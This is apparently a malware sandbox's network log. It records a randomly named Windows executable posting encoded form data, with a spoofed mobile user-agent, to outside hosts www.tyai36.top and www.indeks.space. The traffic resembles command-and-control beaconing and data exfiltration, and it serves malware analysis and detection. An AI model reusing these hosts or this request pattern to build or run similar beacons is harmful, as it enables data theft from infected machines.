58	192.168.11.20	49864	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:38.408102989 CEST	782	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 48 70 62 75 38 74 48 54 68 79 76 38 2b 55 38 63 68 59 49 46 65 67 32 7a 61 48 4c 7a 41 72 6f 51 30 2f 47 51 67 4e 78 77 4a 67 52 45 36 4f 2f 45 31 49 6d 46 68 7a 43 68 64 30 65 57 32 6a 50 39 54 31 42 79 7a 77 5a 4a 66 33 31 53 6f 41 53 76 4f 55 66 39 63 6f 36 66 36 57 51 6c 36 47 33 4c 4b 63 63 45 35 48 31 6f 49 55 59 39 5a 75 31 65 58 4a 48 58 46 7a 4c 4e 6e 43 56 44 62 4e 4d 2b 7a 39 6b 43 61 45 4d 69 53 62 45 59 6e 6c 39 38 72 39 4e 55 51 48 4d 6c 68 79 46 34 6f 7a 49 57 6b 34 57 6e 67 73 61 2f 4c 61 7a 41 43 79 32 63 66 76 35 51 2f 51 3d 3d Data Ascii: AvLLLbOh=uBlYw/DxHcoMHpbu8tHThyv8+U8chYIFeg2zaHLzAroQ0/GQgNxwJgRE6O/E1ImFhzChd0eW2jP9T1ByzwZJf31SoASvOUf9co6f6WQl6G3LKccE5H1oIUY9Zu1eXJHXFzLNnCVDbNM+z9kCaEMiSbEYnl98r9NUQHMlhyF4ozIWk4Wngsa/LazACy2cfv5Q/Q==
Aug 27, 2024 17:50:38.716283083 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:38 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	49865	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:41.266011953 CEST	1122	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 4d 51 31 65 32 51 6e 49 64 77 4f 67 52 45 69 65 2f 42 32 34 6d 4f 68 7a 66 42 64 30 53 57 32 6a 4c 39 42 33 35 79 69 77 5a 4b 51 58 31 54 72 41 53 69 5a 45 66 4e 63 6f 32 44 36 58 30 6c 36 32 62 4c 62 75 45 45 75 43 4a 76 4d 30 59 37 66 75 31 64 4f 5a 48 4a 46 7a 33 76 6e 44 39 54 62 2b 51 2b 7a 64 45 43 5a 45 4d 68 61 72 45 66 72 46 38 70 6d 50 39 65 54 30 45 59 6e 79 74 39 76 42 30 35 6e 66 36 2f 69 73 6d 48 55 4c 50 6a 44 43 50 33 4b 63 55 46 37 44 52 6c 75 39 76 44 74 46 71 56 64 6b 62 37 6d 4b 57 69 43 36 7a 41 2f 79 52 30 30 77 4a 4a 6a 33 34 41 36 2f 58 74 44 39 65 6c 6d 54 59 4c 51 78 6f 34 52 59 33 6e 5a 75 68 72 4c 36 47 67 36 73 44 6b 42 42 71 54 4d 4c 75 44 37 42 64 71 44 65 51 77 4c 47 5a 53 34 42 6c 5a 4d 63 48 59 36 5a 7a 41 6a 78 56 35 38 51 4b 56 70 34 37 46 4a 64 51 4f 67 49 47 4b 47 74 72 6f 6e 69 70 5a 78 57 71 6c 44 51 6e 4f 41 [TRUNCATED] Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYMQ1e2QnIdwOgREie/B24mOhzfBd0SW2jL9B35yiwZKQX1TrASiZEfNco2D6X0l62bLbuEEuCJvM0Y7fu1dOZHJFz3vnD9Tb+Q+zdECZEMharEfrF8pmP9eT0EYnyt9vB05nf6/ismHULPjDCP3KcUF7DRlu9vDtFqVdkb7mKWiC6zA/yR00wJJj34A6/XtD9elmTYLQxo4RY3nZuhrL6Gg6sDkBBqTMLuD7BdqDeQwLGZS4BlZMcHY6ZzAjxV58QKVp47FJdQOgIGKGtronipZxWqlDQnOA7HnTZNYuZsQMFBC26G1ggrA5dn9F8wm8rZ9CcWEI9sWUk6xo/g03K/oJJdCcVbgJypFxX/tARlyVhj1uwFjERhAdGRVltiCVIEcgIl080yaie1fME2LLmq5/SZ7uGZ2Xc5hpdRcYIAikjo4L13+KS1YH1i0oZP4kIquAqUF0FmzY9mP2N34omTGHAd6GegCSTXrAe1W6GuipCA=
Aug 27, 2024 17:50:41.589143991 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:41 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.11.20	49866	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:44.127801895 CEST	1289	OUT	POST /7te8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tyai36.top Origin: http://www.tyai36.top Referer: http://www.tyai36.top/7te8/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 45 51 30 73 2b 51 68 72 6c 77 50 67 52 45 38 4f 2f 41 32 34 6d 70 68 7a 58 65 64 30 75 47 32 68 44 39 42 67 39 79 69 69 42 4b 41 48 31 51 75 41 53 67 4f 55 66 5a 63 6f 36 70 36 58 52 51 36 47 76 4c 4b 5a 67 45 35 6c 64 6f 45 45 59 39 66 75 31 42 4b 5a 48 42 46 7a 7a 2f 6e 44 68 54 62 39 6b 2b 68 65 38 43 4b 48 6b 68 58 62 45 63 68 6c 38 79 73 76 38 75 54 30 67 6d 6e 79 74 4c 76 44 59 35 6e 59 75 2f 73 50 4f 45 55 72 50 6a 4c 69 50 30 62 4d 59 42 37 44 4e 74 75 39 72 44 74 48 71 56 64 45 62 37 32 37 57 6a 53 71 7a 61 6f 69 52 64 77 77 56 42 6a 33 73 71 36 2f 44 74 44 4e 69 6c 38 41 41 4c 53 56 38 34 63 59 33 66 58 4f 68 43 42 61 47 38 36 74 79 48 42 46 57 70 4d 4a 43 44 36 67 39 71 52 76 51 7a 62 32 59 62 30 68 6b 42 47 4d 62 45 36 59 65 44 6a 78 55 6b 38 56 71 56 70 4c 7a 46 49 63 51 42 6a 59 47 4a 4b 4e 72 39 70 43 31 48 78 57 47 74 44 54 6e 65 41 [TRUNCATED] Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYEQ0s+QhrlwPgRE8O/A24mphzXed0uG2hD9Bg9yiiBKAH1QuASgOUfZco6p6XRQ6GvLKZgE5ldoEEY9fu1BKZHBFzz/nDhTb9k+he8CKHkhXbEchl8ysv8uT0gmnytLvDY5nYu/sPOEUrPjLiP0bMYB7DNtu9rDtHqVdEb727WjSqzaoiRdwwVBj3sq6/DtDNil8AALSV84cY3fXOhCBaG86tyHBFWpMJCD6g9qRvQzb2Yb0hkBGMbE6YeDjxUk8VqVpLzFIcQBjYGJKNr9pC1HxWGtDTneA8fnV5NYq+YTC1Ar06Gn/Qrt5drhF9lE7YN9CsGEPtsVE072mfgpzK/oJJRWcVXgKHFFwnPtSSdyXhjzuwFyERl7dGZvltS4VLocjd509Fyb1u0XIE2QIW2q/U9zuC9mXuNh7NBccIAtyzpyOF29bC4ZH1+OoYq1kISuFMhfpQGlFMXE8OjcuHCRPDNwH+13RWLIHtl3m1vg/WhWkd3mZ464amb432jrRBoVkpWQaRo/S2JmNzCs2LwAJw23czx0r8kjgEHUQ8EkBB+ZTVc3HcaDMBdBgaItL0G7zpRiheVi8qquDPW22S64YaUz0iQd/Nx+h877hx+vV9k0R18rXVDIcwbwbMpvjX5ka7tsUSiF6f5LT2yeU
Aug 27, 2024 17:50:44.127852917 CEST	2578	OUT	Data Raw: 65 78 44 6f 71 4e 6e 72 50 4e 58 64 52 39 47 34 42 71 34 6d 48 6c 47 66 50 6f 46 44 62 32 39 70 30 35 52 2b 52 6e 79 50 6f 72 63 4e 4d 4e 68 2b 54 72 42 6e 47 41 33 65 6b 32 65 78 48 66 31 36 39 2f 2f 31 6a 6d 45 6a 64 34 4d 4f 70 70 77 51 34 71 Data Ascii: exDoqNnrPNXdR9G4Bq4mHlGfPoFDb29p05R+RnyPorcNMNh+TrBnGA3ek2exHf169//1jmEjd4MOppwQ4q3CSPup24nVBmd8VBNyVpTQFUJzs/h7AVZAALet3wNbk+Jbq8vFoEFtSfYNtu9IO5q5uy1VhlUA6K+ckqce6rsTzwf88xfMtH0jHlDIlK42/Wuva3karx4Ur7YUttrvFXMAnrNApg1RGLKp9XzSczoQjGUEuEKs9e9
Aug 27, 2024 17:50:44.127901077 CEST	9023	OUT	Data Raw: 69 4a 6b 45 65 7a 75 34 69 52 57 61 71 43 74 6e 30 59 39 7a 4f 7a 45 72 71 45 36 76 58 48 74 36 31 41 31 52 31 5a 67 37 7a 41 42 53 4e 4d 31 2f 6c 51 50 7a 30 2b 68 49 62 47 51 34 4a 47 45 2b 61 46 39 43 78 41 6f 34 4c 51 78 59 34 4e 51 75 79 57 Data Ascii: iJkEezu4iRWaqCtn0Y9zOzErqE6vXHt61A1R1Zg7zABSNM1/lQPz0+hIbGQ4JGE+aF9CxAo4LQxY4NQuyW2n+sPArLfnniJ2E9FAl68J5zo0e/hvVWVI5TSeKEfZ5+TqfrPq+SPGUnK/Di810XzENuBrp/I7L+kYQLGpDPIJLOCnZal2wZSl4/qvL1YubwcXxI3DyB2SkMxdFJdt+XmxLkBS3EnH8e6J6v2pTSL+Nrsaa/SG3Iy
Aug 27, 2024 17:50:44.450731993 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:44 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 27, 2024 17:50:44.450788021 CEST	1289	OUT	Data Raw: 69 6e 5a 70 57 41 38 50 52 5a 70 77 7a 33 2b 31 4d 4f 5a 4a 6b 58 4c 74 4e 70 42 74 7a 31 62 4f 39 4f 34 2f 6d 74 4d 32 53 55 51 54 63 39 4d 54 61 5a 30 6c 63 77 33 4f 76 4c 4a 67 74 51 6a 71 39 4b 4f 70 41 6f 4d 6b 34 4d 48 43 6c 39 49 33 54 4d Data Ascii: inZpWA8PRZpwz3+1MOZJkXLtNpBtz1bO9O4/mtM2SUQTc9MTaZ0lcw3OvLJgtQjq9KOpAoMk4MHCl9I3TMMS8u7v5OuBQFgaviAWe+LhUHp17DHWRkfJLqJB8uE2LjFFD79adD/9RV4fIInH0s6eIrdzcBOCuLj5MJtKLtpDHShdIFTHNnib0uWgecpdGtWJY6r2AwtETq8+9CcamN1oUdOfk4pnxFKGXLxz183tj7+Sj8r42EQ
Aug 27, 2024 17:50:44.450828075 CEST	1289	OUT	Data Raw: 41 50 6a 57 48 30 64 72 4d 45 48 4a 79 38 70 39 64 50 42 4d 55 6f 6c 45 56 48 64 48 73 43 36 46 69 37 38 75 54 43 64 38 63 62 46 42 45 69 64 49 74 72 4a 6b 6c 4a 65 37 78 61 45 31 56 72 72 2b 4c 50 55 4f 2b 4e 4c 58 6b 4e 39 61 71 39 2f 55 44 54 Data Ascii: APjWH0drMEHJy8p9dPBMUolEVHdHsC6Fi78uTCd8cbFBEidItrJklJe7xaE1Vrr+LPUO+NLXkN9aq9/UDTYdPivc47n0zyLIIn42H9Mmhoc4SFS2Ng9W2LGlbIqB/T86lr7CSlHRIuS1fcfc+ZchOoi1bJJqhq4RCmyF58lMsNOY8HxRkbBfZhcdhLaA2JDootzoaefYvfH98gvxn3M44C+N9gK3h/fb4SzBoDrTdzLiHZtMJbh
Aug 27, 2024 17:50:44.451117039 CEST	1289	OUT	Data Raw: 73 6b 69 75 68 2f 69 54 75 50 75 31 39 6d 68 4b 38 68 56 57 6f 33 7a 67 4e 62 69 33 43 4d 34 64 46 58 34 68 78 67 35 50 2b 64 49 33 73 2f 54 56 65 66 5a 71 71 39 6e 65 59 43 5a 73 74 4a 4c 7a 4c 72 38 31 5a 7a 6b 6a 6d 37 62 61 7a 53 61 4a 57 49 Data Ascii: skiuh/iTuPu19mhK8hVWo3zgNbi3CM4dFX4hxg5P+dI3s/TVefZqq9neYCZstJLzLr81Zzkjm7bazSaJWIz6WGdrbSj4cgpVcYl7oZ+aoYsYi1LrQl5wjfhNlp2DxTbwipZ/ahNwO2aauvQicyxVb7Y+xH0qlHVKjqR/XAsD/yFFfAfKmwQd6zXs3A7P8c4QSwh+iLg+xOmPWO8ItVACJnl9Lf7qYOCHT0ScPLyCnRYMve2agKE
Aug 27, 2024 17:50:44.451292038 CEST	9023	OUT	Data Raw: 49 48 51 62 6e 52 69 63 75 50 72 50 67 34 47 55 74 58 59 4c 48 37 77 4c 6f 52 78 63 31 68 50 4f 6d 78 2f 68 4c 62 65 48 42 41 66 2f 50 34 62 68 68 4b 32 36 37 73 71 44 55 2b 72 77 4a 65 59 39 68 58 6d 2f 58 54 35 6d 2f 76 61 64 75 2b 43 6f 48 72 Data Ascii: IHQbnRicuPrPg4GUtXYLH7wLoRxc1hPOmx/hLbeHBAf/P4bhhK267sqDU+rwJeY9hXm/XT5m/vadu+CoHrDJJtTGbHMp40fzsyqACtQkz9vPcpEQPZU2vezC847fxQMY4Jt6rFVmIzQSxywJVn6hWIPBWlbI018VZpIINS2USEqEH+Cs6wIgGtWJU0B/z1YPitF6Pm9JK5/ijOJK7tL0erw6alEVpSLCUs+h3akchDWBDCexlp8
Aug 27, 2024 17:50:44.451628923 CEST	7734	OUT	Data Raw: 4b 52 59 42 2f 4f 63 30 33 31 4e 74 4a 30 37 32 49 59 55 64 4f 37 73 65 35 39 62 2b 6e 79 6a 47 70 79 49 31 57 30 4e 44 6d 37 7a 31 4f 37 67 6f 35 77 6a 64 79 42 50 67 46 6c 44 65 59 66 43 78 74 69 7a 39 35 63 61 6f 70 5a 55 4a 4b 45 71 6a 47 6f Data Ascii: KRYB/Oc031NtJ072IYUdO7se59b+nyjGpyI1W0NDm7z1O7go5wjdyBPgFlDeYfCxtiz95caopZUJKEqjGoHwRg2ItXIG9SHmAk+gNZl6XxwIby7v/LrpTOjvaa7LCQgbFVchBKz+JwhztMvQW5qS5qcWURMtVfkqzi1586PZ48jk/PU7r+SFjIp3tJpJZB0dqRrnqWicVue7E6h7+ClDGazQbdpFgIWbx+7AvGKVlEfbYj61RbU
Aug 27, 2024 17:50:44.451967001 CEST	3867	OUT	Data Raw: 7a 75 4b 76 56 34 45 48 38 32 76 32 36 65 44 31 53 59 68 79 4b 6e 76 38 38 6c 35 7a 39 32 53 59 73 4d 53 6f 6e 6d 67 6b 2b 58 35 79 30 4c 47 34 54 2b 56 65 41 53 78 59 56 42 54 4c 78 39 6d 75 73 50 6e 47 32 73 47 73 51 35 78 71 31 34 45 78 6c 36 Data Ascii: zuKvV4EH82v26eD1SYhyKnv88l5z92SYsMSonmgk+X5y0LG4T+VeASxYVBTLx9musPnG2sGsQ5xq14Exl63L4+TjbH4JKYRGSbtE8emm+yz5MGz5H3d4q8zAtcAreYk23ZZyriWp2uLKF5kTfV300zb1A9P8qWSSSqkI4Hw7dL7E6ccYILNCSXAjlffN+9dTtemHTNvAWCEYpBT3tzwZVuFJSyzWj28bQ1L/NBIMpUj14DIwpiY
Aug 27, 2024 17:50:44.452136040 CEST	1289	OUT	Data Raw: 62 4b 33 52 4a 38 68 56 66 57 48 5a 4a 70 6f 4e 6f 43 4e 48 35 36 59 48 77 70 36 6c 47 72 2b 45 77 53 79 30 67 68 32 56 57 64 79 53 6c 4c 6d 61 53 72 33 6d 34 72 42 31 63 37 56 76 64 31 39 65 4c 6a 51 4e 69 54 68 64 6a 58 47 59 63 53 5a 58 65 30 Data Ascii: bK3RJ8hVfWHZJpoNoCNH56YHwp6lGr+EwSy0gh2VWdySlLmaSr3m4rB1c7Vvd19eLjQNiThdjXGYcSZXe0+qskzbC2lF6kHKdcE/1ljXtu/1boQDtO8k6o+K1y33Z/TiHD1Cp6O2qq0g4a84gtUO/2h22GWlKyvrxPVGXSpVSNKuZLIl4H+0i4sHsd6xA54I43FH0EzuDkSUeuatgS23jVLrfydTgDcAfDCYaNFtFEojwC/+uIx
Aug 27, 2024 17:50:44.774113894 CEST	2578	OUT	Data Raw: 77 57 6e 72 73 56 6b 6a 6c 38 66 48 66 41 61 4e 76 56 6d 33 54 7a 67 57 36 35 32 72 6c 39 6a 42 38 6d 41 49 30 59 75 66 2f 70 4e 4a 6f 36 45 4f 4b 37 4f 70 4f 59 51 2f 30 33 43 34 34 31 2b 4a 55 70 38 52 6d 67 70 30 4e 2f 54 68 59 53 62 50 49 53 Data Ascii: wWnrsVkjl8fHfAaNvVm3TzgW652rl9jB8mAI0Yuf/pNJo6EOK7OpOYQ/03C441+JUp8Rmgp0N/ThYSbPISpeP2GmAlahenOCGNGAAaomznRRT1CfrTETX3yuG7NBAij52a8rK5GnNYZ9IpU/7zSQYK6JMhoRjgZtdzX7FTEKjIhaRaNqpvspoCqcztYbVSifw30SYLZtDH/zmkrfdJfYbDEbpEyF4tQ2y+v42EsM1nf2YEEx1lZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.11.20	49867	38.47.207.120	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:46.959758997 CEST	523	OUT	GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.tyai36.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:50:47.261290073 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:47 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66b12d1b-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.11.20	49868	194.58.112.174	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:00.716893911 CEST	788	OUT	POST /1fqp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.indeks.space Origin: http://www.indeks.space Referer: http://www.indeks.space/1fqp/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 71 55 77 6e 48 39 59 49 52 30 54 66 56 38 2b 39 64 6e 39 55 62 4d 68 63 61 57 67 67 43 4a 36 44 37 34 69 75 77 76 59 61 33 51 66 68 77 66 4d 59 64 36 55 67 34 54 53 45 45 75 79 47 66 73 75 33 49 52 50 67 6f 77 79 62 48 4a 44 65 73 4c 47 47 59 46 74 71 6f 46 76 37 56 77 6b 59 43 55 49 62 4e 35 7a 49 39 5a 45 47 6a 53 42 52 64 4d 31 62 64 48 62 48 61 74 46 4a 43 45 4b 6f 68 6b 47 57 73 66 50 4b 4f 41 63 4f 7a 30 69 55 47 6d 63 50 66 75 59 48 37 39 2f 33 72 62 59 34 36 6f 57 38 31 2b 36 49 4b 79 4a 7a 7a 56 76 67 6c 79 7a 61 71 55 38 67 52 41 3d 3d Data Ascii: AvLLLbOh=3o4Rl9PM4HB2qUwnH9YIR0TfV8+9dn9UbMhcaWggCJ6D74iuwvYa3QfhwfMYd6Ug4TSEEuyGfsu3IRPgowybHJDesLGGYFtqoFv7VwkYCUIbN5zI9ZEGjSBRdM1bdHbHatFJCEKohkGWsfPKOAcOz0iUGmcPfuYH79/3rbY46oW81+6IKyJzzVvglyzaqU8gRA==
Aug 27, 2024 17:51:00.948698997 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:51:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED] Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+\|\\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N\|%$7E\|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM\| [TRUNCATED]
Aug 27, 2024 17:51:00.948796034 CEST	1289	IN	Data Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8 Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
